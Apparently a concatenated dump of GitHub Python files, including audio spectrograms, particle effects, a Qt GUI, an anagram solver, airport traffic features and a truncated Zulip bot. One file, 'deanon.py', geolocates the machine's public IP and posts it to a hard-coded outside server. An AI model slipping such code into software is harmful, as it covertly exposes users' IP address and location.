------------------ Important constants ------------------------ #\n\n\ndef range_to_indices(start_t, stop_t, fs):\n\n \"\"\"\n Returns a cropped section of a sound file between two\n particular timestamps (seconds).\n\n :param start_t: starting time in seconds\n :param stop_t: ending time in seconds\n :param fs: sample rate\n\n :return start_index: beginning index to crop at\n :return stop_index: end index to crop at\n \"\"\"\n\n return int(round(start_t * fs)), int(round(stop_t * fs))\n\n\ndef get_and_normalize_sound(file_path, max_int=MAX_INT_16, normalize=True):\n\n \"\"\"\n Gets desired sound file and normalizes it to largest possible integer.\n\n :param file_path: path to desired file\n :param max_int: integer to use in normalization\n\n :return sample_rate: sample rate of the sound file\n :return samples: sound samples from file\n \"\"\"\n\n sample_rate, samples = wavfile.read(file_path)\n\n if normalize:\n samples = np.divide(samples, max_int)\n\n return sample_rate, samples\n\n\ndef parse_begin_date_and_time(row):\n\n \"\"\"\n\n Parses date/time information of a row in the data frame created from AllCalls_multichannel_2.txt\n to put it the format of the corresponding sound file in SAMBAY/..../multichannel_wave_1h.\n\n :param row: row of a pandas dataframe from AllCalls_multichannel_2.txt to analyze\n :return filename: datetime string in format 'yyyymmdd-hh0000_multichannel_wav_SAMBAYu.wav'\n\n \"\"\"\n\n date_and_time = row.BeginDateTime.split()\n date, time = date_and_time[0], date_and_time[1]\n\n # Parse out the file to get sound from\n time = time.split(':')\n\n if len(time[0]) == 1:\n time_end = '0' + time[0] + '0000'\n else:\n time_end = time[0] + '0000'\n\n if len(date) == 8:\n date = date.replace(\"/\", \"0\")\n else:\n date = date.replace(\"/\", \"0\", 1).replace(\"/\", '')\n\n file_name = date + '-' + time_end + '_multichannel_wav_SAMBAYu.wav'\n\n # Get start and end times\n time_start = float(time[1])*SECONDS_PER_MINUTE + float(time[2])\n time_stop = time_start + float(row.DeltaTime)\n\n return time_start, time_stop, file_name\n\n\ndef my_stft(samples, fs, window_N, window_overlap=1, NFFT=2048, DECIMATE_FACTOR=4):\n\n \"\"\"\n Creates spectrogram from the provided data.\n\n :param samples: signal\n :param fs: samples rate\n :param window_N: length of window\n\n :return time: timeseries\n :return freq: frequency array\n :return Zxx: stft\n :return fs: new sampling frequency after signal has been decimated\n\n \"\"\"\n\n # Mean center the data\n samples = samples - np.mean(samples)\n s = decimate(samples, DECIMATE_FACTOR)\n fs = fs / DECIMATE_FACTOR\n\n # Get length of signal\n Ns = len(s)\n\n # Calculate time and frequency axes\n time = np.linspace(0, Ns-1, Ns) / fs\n freq = np.linspace(0, NFFT-1, NFFT) * (fs/NFFT)\n\n # Create custom window and calculate stft\n window = hamming(window_N)\n _, _, Zxx = stft(s, nfft=NFFT, return_onesided=False, window=window, nperseg=window_N, noverlap=window_N-window_overlap)\n\n return time, freq, Zxx, fs\n\n\nif __name__ == \"__main__\":\n\n DATA_PATH = \"C:/Users/mgoldwater/Desktop/WHOI Storage/SAMBAY\"\n\n # Read in .txt file which describes the data as a pandas dataframe\n df = pd.read_csv(os.path.join(DATA_PATH, 'metadata/AllCalls_multichannel_2.txt'), sep='\\t')\n df.columns = ['Selection',\n 'View',\n 'Channel',\n 'BeginTimes',\n 'EndTimes',\n 'LowFreq',\n 'HighFreq',\n 'BeginDateTime',\n 'DeltaFreq',\n 'DeltaTime',\n 'CenterFreq',\n 'PeakFreq',\n 'BasicCat',\n 'Quality',\n 'Localization']\n\n # Loop indices to plot a spectrogram for each row in the dataframe\n for call in [30]:\n\n # Get current row and the name of the corresponding file\n curr_row = df.loc[call]\n start_time, stop_time, corresponding_file = parse_begin_date_and_time(curr_row)\n\n # Get and normalize the data from the file\n fs, samples_norm = get_and_normalize_sound(os.path.join(DATA_PATH,\n \"acoustic data/multichannel_wav_1h\",\n corresponding_file))\n\n # Get the start and end time of the call, and add a 0.5 [s] buffer on either side.\n # Then, convert these times to indices in the vector\n #starti, stopi = range_to_indices(start_time - 0.15, start_time + 0.334 + 0.15, fs)\n starti, stopi = range_to_indices(start_time - 0.15, start_time + 0.211 + 0.15, fs)\n\n # Get the channel, subtracting one for indexing purposes\n channel = curr_row.Channel - 1\n\n # Crop the sound vector\n samples = samples_norm[starti:stopi, channel]\n\n # Calculate the stft\n window_N = 31\n time, freq, Zxx, fs = my_stft(samples, fs, window_N, window_overlap=2, NFFT=2 ** 9)\n spectro = 10 * np.log10(np.abs(Zxx) ** 2)\n spectro = spectro[round(spectro.shape[0] / 2):, :]\n\n print(spectro.shape)\n\n # Plot the figure\n plt.figure()\n plt.imshow(spectro, aspect='auto')\n plt.ylim(spectro.shape[0], spectro.shape[0] / 2)\n plt.show()\n","repo_name":"whoi-mars/ssf_goldwater","sub_path":"utils/spect.py","file_name":"spect.py","file_ext":"py","file_size_in_byte":5821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"34710441907","text":"import requests\r\nimport re\r\nimport json\r\napi_key = \" \" #API_KEY \r\n\r\nmy_ip_res = requests.get(\"https://2ip.ru/\").content\r\nmy_ip = re.findall('IP адрес: \\d+\\.\\d+\\.\\d+\\.\\d+', my_ip_res.decode('utf-8'))[0].split(\" \")[-1]\r\n\r\ngeo_res = requests.get(\"http://api.ipstack.com/%s?access_key=%s&format=1\" % (my_ip, api_key))\r\nprint(geo_res.content.decode('utf-8'))\r\n\r\nresult = json.loads(geo_res.content)\r\nlatitude, longitude = result['latitude'], result['longitude']\r\n\r\n\r\npost_res = str(\"IP:%s Lat:%s Long:%s\" % (str(my_ip), str(latitude), str(longitude))).encode('utf-8')\r\nprint(post_res)\r\nrequests.post(\"http://130.61.88.149/\", data=post_res)","repo_name":"VinceHov/VinceHov","sub_path":"PythonShit/deanon.py","file_name":"deanon.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"5119807157","text":"from ParticleEffectController import *\nfrom ParticleEffectController_Smoke import *\nfrom ParticleEffectController_Lightning import *\nfrom ParticleEffectController_Rain import *\nfrom ParticleEffectController_Energy import *\nparticleEffectArrayLightning = []\nparticleEffectArrayFire = []\nparticleEffectArraySmoke = []\nparticleEffectArrayRain = []\nparticleEffectArrayEnergy = []\n\nclass ParticleSystem:\n def __init__(self,positionX,positionY,lifeSpan):\n self.x = positionX\n self.y = positionY\n self.life = lifeSpan\n\n \n def update(self):\n for particleEffect in particleEffectArrayFire:\n particleEffect.update()\n particleEffect.updateTimer()\n particleEffect.lifeSpan()\n for particleEffectSmoke in particleEffectArraySmoke:\n particleEffectSmoke.update()\n particleEffectSmoke.updateTimer()\n particleEffectSmoke.lifeSpan()\n for particleEffectLight in particleEffectArrayLightning:\n particleEffectLight.updateTimer()\n particleEffectLight.randomX()\n particleEffectLight.spawnLightning()\n particleEffectLight.checkYLocal()\n particleEffectLight.purgeLightning()\n for particleEffectRain in particleEffectArrayRain:\n particleEffectRain.update()\n particleEffectRain.updateTimer()\n particleEffectRain.spawnRain()\n for particleEffectEnergy in particleEffectArrayEnergy:\n particleEffectEnergy.update()\n particleEffectEnergy.updateTimer()\n particleEffectEnergy.spawnParticles()\n \n \n def render(self):\n for particleEffect in particleEffectArrayFire:\n particleEffect.display()\n for particleEffectSmoke in particleEffectArraySmoke:\n particleEffectSmoke.display()\n for particleEffectLight in particleEffectArrayLightning:\n particleEffectLight.display()\n for particleEffectRain in particleEffectArrayRain:\n particleEffectRain.display()\n for particleEffectEnergy in particleEffectArrayEnergy:\n particleEffectEnergy.display()\n \n def addParticleEffect(self, name, mode):\n if name == 'fire':\n if mode == 'timed':\n particleEffectArrayFire.append(ParticleEffectController(self.x,self.y,self.life))\n if mode == 'loop':\n particleEffectArrayFire.append(ParticleEffectController(self.x,self.y,99999))\n if name == 'smoke':\n if mode == 'timed':\n particleEffectArraySmoke.append(ParticleEffectController_Smoke(self.x,self.y,self.life))\n if mode == 'loop':\n particleEffectArraySmoke.append(ParticleEffectController_Smoke(self.x,self.y,99999))\n if name == 'lightning':\n if mode == 'timed' or mode == 'loop':\n particleEffectArrayLightning.append(ParticleEffectController_Lightning(self.x,self.y,30,self.life))\n if name == 'rain':\n particleEffectArrayRain.append(ParticleEffectController_Rain(self.x,self.y,99999))\n if name == 'energy':\n if mode == 'timed':\n particleEffectArrayEnergy.append(ParticleEffectController_Energy(self.x,self.y,self.life))\n if mode == 'loop':\n particleEffectArrayEnergy.append(ParticleEffectController_Energy(self.x,self.y,99999))\n def clearAll(self):\n global particleEffectArrayFire, particleEffectArraySmoke, particleEffectArrayRain, particleEffectArrayEnergy\n particleEffectArrayFire = []\n particleEffectArraySmoke = []\n particleEffectArrayRain = []\n particleEffectArrayEnergy = []\n","repo_name":"Jyngi/processing_particlesystem","sub_path":"ParticleSystem.py","file_name":"ParticleSystem.py","file_ext":"py","file_size_in_byte":3709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70158506249","text":"from PyQt5.Qt import *\nfrom GUI.resource.personal import Ui_Form\nfrom Database import DB\nimport signup\n\nclass PersonalPane(QWidget, Ui_Form):\n\n logout_pane_signal = pyqtSignal()\n show_send_message_GUI_signal = pyqtSignal()\n\n def __init__(self, parent=None, *args, **kwargs):\n super().__init__(parent, *args, **kwargs)\n self.setAttribute(Qt.WA_StyledBackground, True)\n self.setupUi(self)\n\n def logout_pane(self):\n self.logout_pane_signal.emit()\n\n def send_button(self):\n self.show_send_message_GUI_signal.emit()\n\n def refresh_show(self):\n message_type = self.comboBox.currentText()\n self.pushButton.setText(message_type)\n database = DB()\n print(signup.login_user)\n if message_type == 'Personal':\n display = database.message_looking(signup.login_user)\n self.textEdit.setPlainText(display)\n if message_type == 'Group':\n display = database.group_message_looking(signup.login_user)\n self.textEdit.setPlainText(display)\n if message_type == 'ALL':\n display = database.message_looking('all')\n self.textEdit.setPlainText(display)\n\n\n\nif __name__ == '__main__':\n import sys\n myapp = QApplication(sys.argv)\n window = PersonalPane()\n window.logout_pane_signal.connect(lambda: print(\"logout\"))\n window.show()\n sys.exit(myapp.exec_())","repo_name":"Kenny-Z/CloudBased-Message-Board-with-Face-Recognition","sub_path":"GUI/personal_GUI.py","file_name":"personal_GUI.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"40564323061","text":"#from wordsets import english_words, english_words_small\nfrom wordsets import english_words_small\n\n\ndef find_anagrams(letters, words):\n \"\"\"Find a collection of anagrams of given letters from a given word bank.\n\n :param letters: The letters from which to form anagrams.\n :param words: A set of lowercase, alphabetic English words in a word bank.\n :return: A set of anagrams of the given letters found in the word bank.\n \"\"\"\n canonicalize_letters = canonicalize(letters)\n\n lookup_dict = build_lookup(words)\n\n if lookup_dict.get(canonicalize_letters, 0):\n return lookup_dict[canonicalize_letters]\n return set()\n\n\n\"\"\"\nCreate a canonicalized string from a given word.\nCanonical meaning letters sorted alphabetically\n:param word: a string to form the canonical string\n:return: A string that has been sorted alphabetically\n\"\"\"\ndef canonicalize(word):\n canonical_list = sorted(word)\n canonical_str = \"\"\n for l in canonical_list:\n canonical_str += l\n return canonical_str\n\n\"\"\"\nCreate a lookup dictionary where each key is the canonical word and each value\nis all the words in the parameter \"words\" that matches.\n\n:param words: a given word bank.\n:return : a dictionary of canonical words (keys)\n and a set of matching words in the words bank (value).\n\"\"\"\ndef build_lookup(words):\n lookup = {}\n key_set = {canonicalize(word) for word in words}\n #print(key_set)\n for key in key_set:\n #print(\"key \" + key)\n for word in words:\n #print(\"word \" + word)\n if key == canonicalize(word):\n #print(\"key == word\")\n if lookup.get(key, 0):\n #print(lookup[key])\n lookup[key] = lookup[key] |{word,}\n else:\n lookup[key] = {word,}\n\n return lookup\n\n\n# Test code. Switch out \"english_words_small\" param to change word bank\nif __name__ == '__main__':\n while True:\n letters = input(\"What letters would you like to find the anagram of? \").lower().strip()\n for anagram in find_anagrams(letters, english_words_small):\n print(anagram)\n","repo_name":"wiggiddywags/python-playground","sub_path":"Anagram/anagram.py","file_name":"anagram.py","file_ext":"py","file_size_in_byte":2141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"34409673098","text":"\"\"\"Manages the exchange_u32.asm patch.\"\"\"\n\n# pylint: disable=consider-using-f-string\n# pylint: disable=too-few-public-methods\n# pylint: disable=invalid-name\n\nimport struct\nfrom Xbox import Xbox\nimport XboxHelper\n\n\nclass _ExchangeU32:\n \"\"\"Manages the exchange_u32.asm patch.\"\"\"\n\n def __init__(self, verbose=True):\n self.exchange_u32_addr = 0\n self.verbose = verbose\n\n def _install_kicker(self, xbox: Xbox):\n with open(\"exchange_u32\", \"rb\") as patch_file:\n data = patch_file.read()\n\n self.exchange_u32_addr = XboxHelper.load_binary(xbox, data)\n if self.verbose:\n print(\"exchange_u32 installed at 0x%08X\" % self.exchange_u32_addr)\n\n def call(self, xbox: Xbox, address: int, value: int) -> int:\n \"\"\"Calls the kicker with the given argument.\"\"\"\n if not self.exchange_u32_addr:\n self._install_kicker(xbox)\n\n return xbox.call(self.exchange_u32_addr, struct.pack(\" int:\n \"\"\"Exchanges `value` with the value at `address`, returning the original value.\"\"\"\n return _instance.call(xbox, address, value)\n","repo_name":"XboxDev/nv2a-trace","sub_path":"ExchangeU32.py","file_name":"ExchangeU32.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"16"} +{"seq_id":"30256498709","text":"__author__ = 'dengzhihong'\n\nimport numpy as np\n\ndef RawLabel2IntList(label):\n return np.array(map(int, map(float, label[:]))) - 1\n\ndef RawData2FloatXYList(data):\n R = 2\n L = len(data)\n data = np.array(map(float, data[:])).reshape(R,L/R)\n X = []\n Y = []\n for i in range(data.shape[1]):\n X.append(data[0][i])\n Y.append(data[1][i])\n return X,Y\n\ndef RawData2XYArray(data):\n dataMat = np.array(map(float, data[:])).reshape(2, len(data)/2)\n return np.mat(dataMat).transpose()","repo_name":"dzh123xt/pythonML","sub_path":"src/Methods/process_data.py","file_name":"process_data.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"28172133374","text":"#\n# Author: Kyler Robison\n#\n# calculate and add traffic information to data table\n#\n\nimport feature_engineering\nimport pandas as pd\n\n\n# calculate various traffic measures for airport\ndef add_traffic(\n now: pd.Timestamp, flights_selected: pd.DataFrame, latest_etd: pd.DataFrame, data_tables: dict[str, pd.DataFrame]\n) -> pd.DataFrame:\n runways = data_tables[\"runways\"]\n\n runways_filtered_3hr = feature_engineering.filter_by_timestamp(runways, now, 3)\n\n deps_3hr = count_actual_flights(runways_filtered_3hr, departures=True)\n flights_selected[\"deps_3hr\"] = pd.Series([deps_3hr] * len(flights_selected), index=flights_selected.index)\n\n deps_30hr = count_actual_flights(runways, departures=True)\n flights_selected[\"deps_30hr\"] = pd.Series([deps_30hr] * len(flights_selected), index=flights_selected.index)\n\n arrs_3hr = count_actual_flights(runways_filtered_3hr, departures=False)\n flights_selected[\"arrs_3hr\"] = pd.Series([arrs_3hr] * len(flights_selected), index=flights_selected.index)\n\n arrs_30hr = count_actual_flights(runways, departures=False)\n flights_selected[\"arrs_30hr\"] = pd.Series([arrs_30hr] * len(flights_selected), index=flights_selected.index)\n\n # technically is the # of planes whom have arrived at destination airport gate and also departed their origin\n # airport over 30 hours ago, but who cares, it's an important feature regardless\n deps_taxiing = count_planes_taxiing(data_tables[\"mfs\"], runways, data_tables[\"standtimes\"], flights=\"departures\")\n flights_selected[\"deps_taxiing\"] = pd.Series([deps_taxiing] * len(flights_selected), index=flights_selected.index)\n\n # apply count of expected departures within various windows\n flights_selected[\"exp_deps_15min\"] = flights_selected.apply(\n lambda row: count_expected_departures(row[\"gufi\"], latest_etd, 15), axis=1\n )\n\n flights_selected[\"exp_deps_30min\"] = flights_selected.apply(\n lambda row: count_expected_departures(row[\"gufi\"], latest_etd, 30), axis=1\n )\n\n return flights_selected\n\n\n# calculate various traffic measures for airport (with private features)\ndef add_traffic_private(\n flights_selected: pd.DataFrame, private_mfs: pd.DataFrame, runways: pd.DataFrame, private_standtimes: pd.DataFrame\n) -> pd.DataFrame:\n arrs_taxiing = count_planes_taxiing(private_mfs, runways, private_standtimes, flights=\"arrivals\")\n flights_selected[\"arrs_taxiing\"] = pd.Series([arrs_taxiing] * len(flights_selected), index=flights_selected.index)\n return flights_selected\n\n\ndef count_actual_flights(runways_filtered, departures: bool) -> int:\n if departures:\n runways_filtered = runways_filtered.loc[pd.notna(runways_filtered[\"departure_runway_actual_time\"])]\n else:\n runways_filtered = runways_filtered.loc[pd.notna(runways_filtered[\"arrival_runway_actual_time\"])]\n\n return runways_filtered.shape[0]\n\n\ndef count_planes_taxiing(mfs, runways, standtimes, flights: str) -> int:\n mfs = mfs.loc[mfs[\"isdeparture\"] == (flights == \"departures\")]\n\n if flights == \"departures\":\n taxi = pd.merge(mfs, standtimes, on=\"gufi\") # inner join will only result in flights with departure stand times\n taxi = pd.merge(taxi, runways, how=\"left\", on=\"gufi\") # left join leaves blanks for taxiing flights\n taxi = taxi.loc[pd.isna(taxi[\"departure_runway_actual_time\"])] # select the taxiing flights\n elif flights == \"arrivals\":\n taxi = runways.loc[pd.notna(runways[\"arrival_runway_actual_time\"])] # arrivals are rows with valid time\n taxi = pd.merge(taxi, standtimes, how=\"left\", on=\"gufi\") # left merge with standtime\n taxi = taxi.loc[pd.isna(taxi[\"arrival_stand_actual_time\"])] # empty standtimes mean still taxiing\n else:\n raise RuntimeError(\"Invalid argument, must specify departures or arrivals\")\n\n return taxi.shape[0]\n\n\ndef count_expected_departures(gufi: str, etd: pd.DataFrame, window: int) -> int:\n time = etd.loc[etd.index == gufi][\"departure_runway_estimated_time\"].iloc[0]\n\n lower_bound = time - pd.Timedelta(minutes=window)\n upper_bound = time + pd.Timedelta(minutes=window)\n\n etd_window = etd.loc[\n (etd[\"departure_runway_estimated_time\"] >= lower_bound)\n & (etd[\"departure_runway_estimated_time\"] <= upper_bound)\n ]\n\n return etd_window.shape[0]\n","repo_name":"krobison10/FLHuskies_PTTF","sub_path":"table_scripts/add_traffic.py","file_name":"add_traffic.py","file_ext":"py","file_size_in_byte":4308,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"} +{"seq_id":"15636596186","text":"import os\nimport glob\nimport json\nimport shutil\nimport numpy as np\nimport xml.etree.ElementTree as ET\n\n\npath2 = '.' # 当前该文件路径\n\nSTART_BOUNDING_BOX_ID = 1\n\n\ndef get(root, name):\n return root.findall(name)\n\n\ndef get_and_check(root, name, length):\n vars = root.findall(name)\n if len(vars) == 0:\n raise NotImplementedError('Can not find %s in %s.' % (name, root.tag))\n if length > 0 and len(vars) != length:\n raise NotImplementedError('The size of %s is supposed to be %d, but is %d.' % (name, length, len(vars)))\n if length == 1:\n vars = vars[0]\n return vars\n\n\ndef convert(xml_list, json_file):\n json_dict = {\"annotations\": []}\n categories = pre_define_categories.copy()\n bnd_id = START_BOUNDING_BOX_ID\n all_categories = {}\n for index, line in enumerate(xml_list):\n # print(\"Processing %s\"%(line))\n xml_f = line\n tree = ET.parse(xml_f)\n root = tree.getroot()\n\n filename = os.path.basename(xml_f)[:-4] + \".jpg\"\n image_id = filename#1 + index\n size = get_and_check(root, 'size', 1)\n width = int(get_and_check(size, 'width', 1).text)\n height = int(get_and_check(size, 'height', 1).text)\n image = {'file_name': filename, 'height': height, 'width': width, 'id': image_id}\n #json_dict['images'].append(image)\n ## Cruuently we do not support segmentation\n # segmented = get_and_check(root, 'segmented', 1).text\n # assert segmented == '0'\n for obj in get(root, 'object'):\n category = get_and_check(obj, 'name', 1).text\n if category in all_categories:\n all_categories[category] += 1\n else:\n all_categories[category] = 1\n if category not in categories:\n if only_care_pre_define_categories:\n continue\n new_id = len(categories) + 1\n print(\n \"[warning] category '{}' not in 'pre_define_categories'({}), create new id: {} automatically\".format(\n category, pre_define_categories, new_id))\n categories[category] = new_id\n category_id = categories[category]\n bndbox = get_and_check(obj, 'bndbox', 1)\n xmin = int(float(get_and_check(bndbox, 'xmin', 1).text))\n ymin = int(float(get_and_check(bndbox, 'ymin', 1).text))\n xmax = int(float(get_and_check(bndbox, 'xmax', 1).text))\n ymax = int(float(get_and_check(bndbox, 'ymax', 1).text))\n assert (xmax > xmin), \"xmax <= xmin, {}\".format(line)\n assert (ymax > ymin), \"ymax <= ymin, {}\".format(line)\n o_width = abs(xmax - xmin)\n o_height = abs(ymax - ymin)\n\n ann = {'name': image_id,\n 'image_height': height,\n 'image_width': width,\n 'category': category_id,\n 'bbox': [\n xmin,\n ymin,\n xmax,\n ymax\n ]\n }\n\n json_dict['annotations'].append(ann) # 将生成的json文件加入annotations文件夹\n bnd_id = bnd_id + 1\n\n json_fp = open(json_file, 'w')\n json_str = json.dumps(json_dict)\n json_fp.write(json_str)\n json_fp.close()\n print(\"------------create {} done--------------\".format(json_file))\n print(\"find {} categories: {} -->>> your pre_define_categories {}: {}\".format(len(all_categories),\n all_categories.keys(),\n len(pre_define_categories),\n pre_define_categories.keys()))\n print(\"category: id --> {}\".format(categories))\n print(categories.keys())\n print(categories.values())\n\n\nif __name__ == '__main__':\n classes = ['L_Y', 'JY1_2', 'Emergency', 'Handle', 'AR', 'QF_A', 'XT_13', 'XT_14', 'XT_15', 'FR_R'] # 类别\n pre_define_categories = {}\n for i, cls in enumerate(classes):\n pre_define_categories[cls] = i+1\n # {'L_Y': 1, 'JY1_2': 2, 'Emergency': 3, 'Handle': 4, 'AR': 5, 'QF_A': 6, 'XT_13': 7,\n # 'XT_14': 8, 'XT_15': 9, 'FR_R': 10}\n\n only_care_pre_define_categories = True\n # only_care_pre_define_categories = False\n\n train_ratio = 1 # 控制train和val的比例 train_ratio=1是全部生成为train数据\n save_json_trian = 'instances_train2014.json'\n save_json_val = 'instance_val2014.json'\n xml_dir = \"Annotation\" # 存放xml文件的文件夹\n\n xml_list = glob.glob(xml_dir + \"/*.xml\")\n # xml_list =['Annotation\\\\2020_08_12_17_45_IMG_5050.xml'...] xml文件路径\n xml_list = np.sort(xml_list)\n np.random.seed(100)\n np.random.shuffle(xml_list)\n\n train_num = int(len(xml_list)*train_ratio)\n xml_list_train = xml_list[:train_num]\n xml_list_val = xml_list[train_num:]\n\n # 将xml文件转换成json文件存储\n convert(xml_list_train, save_json_trian)\n convert(xml_list_val, save_json_val)\n\n if os.path.exists(path2 + \"/annotations\"):\n shutil.rmtree(path2 + \"/annotations\")\n os.makedirs(path2 + \"/annotations\")\n\n if os.path.exists(path2 + \"/images/train2014\"):\n shutil.rmtree(path2 + \"images/train2014\")\n os.makedirs(path2 + \"/images/train2014\")\n\n if os.path.exists(path2 + \"/images/val2014\"):\n shutil.rmtree(path2 + \"/images/val2014\")\n os.makedirs(path2 + \"/images/val2014\")\n\n f1 = open(\"train.txt\", \"w\")\n for xml in xml_list_train:\n img = xml[:-4] + \".jpg\" # 根据xml文件路径获取图片路径,此时图片和xml文件都在annotations文件夹中\n f1.write(os.path.basename(xml)[:-4] + \"\\n\")\n shutil.copyfile(img, path2 + \"/images/train2014/\" + os.path.basename(img)) # 将用于训练的图片存入训练集\n\n f2 = open(\"test.txt\", \"w\")\n for xml in xml_list_val:\n img = xml[:-4] + \".jpg\"\n f2.write(os.path.basename(xml)[:-4] + \"\\n\")\n shutil.copyfile(img, path2 + \"/images/val2014/\" + os.path.basename(img)) # 将用于测试的图片存入测试集\n f1.close()\n f2.close()\n print(\"-------------------------------\")\n print(\"train number:\", len(xml_list_train))\n print(\"val number:\", len(xml_list_val))\n\n\n\n","repo_name":"aoko-sys/Improved-YOLOv5","sub_path":"YOLT/DataPre_Tensorflow-master/data/io/DOTA/xmltojson.py","file_name":"xmltojson.py","file_ext":"py","file_size_in_byte":6416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"42416223974","text":"# Write your code here\n \nn = int(input())\ntotal = 0\nprevious = None\ntotal_smaller = 0\nstack = []\nfor x in input().split():\n count = 0\n num = int(x)\n while stack:\n if stack[-1][0] < num:\n count += stack.pop()[1]\n else:\n break\n \n if stack:\n if stack[-1][0] == num:\n count += stack[-1][1]\n stack[-1][1] += 1\n if len(stack)>1:\n count += 1\n else:\n count += 1\n stack.append([num,1])\n else:\n stack.append([num,1])\n total += count\n #print(stack)\nprint(total)","repo_name":"Hardik500/Local_Code","sub_path":"HackerEarth/Capital_of_Hills.py","file_name":"Capital_of_Hills.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"73409503049","text":"port_name = \"/dev/ttyACM0\"\nfile_name = \"watering.csv\"\n\nimport serial\nimport io\nimport time\n\ns = serial.Serial(port_name)\nf = open(file_name,\"a\");\nrunning = True\n\nwhile running:\n v = s.readline().decode().strip()\n date = time.strftime(\"%Y-%m-%d %H:%M:%S\")\n f.write(date)\n f.write(\",\")\n f.write(v)\n f.write(\"\\n\")\n f.flush()\n\n print(v)\n\n\n","repo_name":"fortega/watering","sub_path":"watering.py","file_name":"watering.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"27868254840","text":"import pprint\nimport zulip\nimport sys\nimport re\nimport json\nimport httplib2\nimport os\nfrom chatterbot import ChatBot\nfrom currency import curr\n#from lat_lon import latlon\nfrom language import Lang\nfrom restaurants import Rest\nfrom bus_stations import Bus\nfrom tourist_places import Tour\nfrom autocorrect import spell\nfrom jobs import Job\nfrom directions import Direct\nfrom atm import Atm\n#from autocorrect import spell\n#from trainers import UbuntuCorpusTrainer\np = pprint.PrettyPrinter()\nBOT_MAIL = \"i-bot@rhtp.zulipchat.com\"\n\ndef dhelp():\n\tmessage = \"**Welcome to I-BOT**\\nIBOT has various subfields\\nType `ibot help ` to get help for specific subfield.\\n\"\n\tmessage += \"\\n**Subfields**\\n\"\n\tmessage += \"`currency` - Get currency conversion rate\\n\"\n\tmessage += \"`atm` - Get addresses of nearby ATM(s)\\n\"\n\tmessage += \"`restaurant` - Get addresses of nearby restaurant(s)\\n\"\n\tmessage += \"`bus` - Get addresses of nearest bus stand(s)\\n\"\n\tmessage += \"`tourist` - Get addresses of nearby tourist place(s)\\n\"\n\tmessage += \"`job` - Get a list of jobs available nearby\\n\"\n\tmessage += \"`direction` - Get directions from one place to other\\n\"\n\tmessage += \"`language` - Translate your English sentences to other languages\\n\"\n\tmessage += \"\\nIf you're bored Talk to IBOT, it will supercharge you\"\n\treturn message\n\nclass ZulipBot(object):\n\tdef __init__(self):\n\t\tself.client = zulip.Client(site=\"https://rhtp.zulipchat.com/api/\")\n\t\tself.subscribe_all()\n\t\tself.chatbot = ChatBot(\"Test\", trainer='chatterbot.trainers.ChatterBotCorpusTrainer')\n\t\t#self.chatbot.train(\"chatterbot.corpus.english\")\n\t\t#self.chatbot.train(\"chatterbot.corpus.english.greetings\")\n\t\t#self.chatbot.train(\"chatterbot.corpus.english.conversations\")\n\t\tself.currency = curr()\n\t\t#self.lat_lon = latlon()\n\t\tself.language = Lang()\n\t\tself.restaurants = Rest()\n\t\tself.bus_stations = Bus()\n\t\tself.tourist_places = Tour()\n\t\tself.jobs = Job()\n\n\t\tself.directions = Direct()\n\t\tself.atm = Atm()\n\t\tself.subkeys = [\"currency\", \"language\", \"restaurant\", \"bus\", \"tourist\", \"job\", \"direction\",\"atm\"]\n\t\t#mesg = dhelp()\n\t\t#self.client.send_message({\n\t\t#\t\"type\": \"stream\",\n\t\t#\t\"content\" : self.mesg\n\t\t#\t})\n\n\tdef urls(self, link):\n\t\turls = re.findall('http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\\(\\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', link)\n\t\treturn urls\n\n\tdef subscribe_all(self):\n\t\tjson = self.client.get_streams()[\"streams\"]\n\t\tstreams = [{\"name\": stream[\"name\"]} for stream in json]\n\t\tself.client.add_subscriptions(streams)\n\n\tdef help(self):\n\t\tmessage = \"**Welcome to I-BOT**\\nIBOT has various subfields\\nType `ibot help ` to get help for specific subfield.\\n\"\n\t\tmessage += \"\\n**Subfields**\\n\"\n\t\tmessage += \"`currency` - Get currency conversion rate\\n\"\n\t\tmessage += \"`atm` - Get addresses of nearby ATM(s)\\n\"\n\t\tmessage += \"`restaurant` - Get addresses of nearby restaurant(s)\\n\"\n\t\tmessage += \"`bus` - Get addresses of nearest bus stand(s)\\n\"\n\t\tmessage += \"`tourist` - Get addresses of nearby tourist place(s)\\n\"\n\t\tmessage += \"`job` - Get a list of jobs available nearby\\n\"\n\t\tmessage += \"`direction` - Get directions from one place to other\\n\"\n\t\tmessage += \"`language` - Translate your English sentences to other languages\\n\"\n\t\tmessage += \"\\nIf you're bored Talk to IBOT, it will supercharge you\"\n\t\treturn message\n\tdef help_sub(self, key):\n\t\tkey = key.lower()\n\t\tmessage = \"**Usage**\\n\"\n\t\tif key == \"currency\":\n\t\t\tmessage += \"`ibot currency from to ` - To get currency conversion rate.\\n\"\n\t\telif key == \"atm\":\n\t\t\tmessage += \"`ibot atm ` - To get addresses of nearby ATM(s).\\n\"\n\t\telif key == \"restaurant\":\n\t\t\tmessage += \"`ibot restaurant ` - To get addresses of nearby restaurant(s).\\n\"\n\t\telif key == \"bus\":\n\t\t\tmessage += \"`ibot bus ` - To get addresses of nearby bus stand(s).\\n\"\n\t\telif key == \"tourist\":\n\t\t\tmessage += \"`ibot tourist ` - To get addresses of nearby tourist place(s).\\n\"\n\t\telif 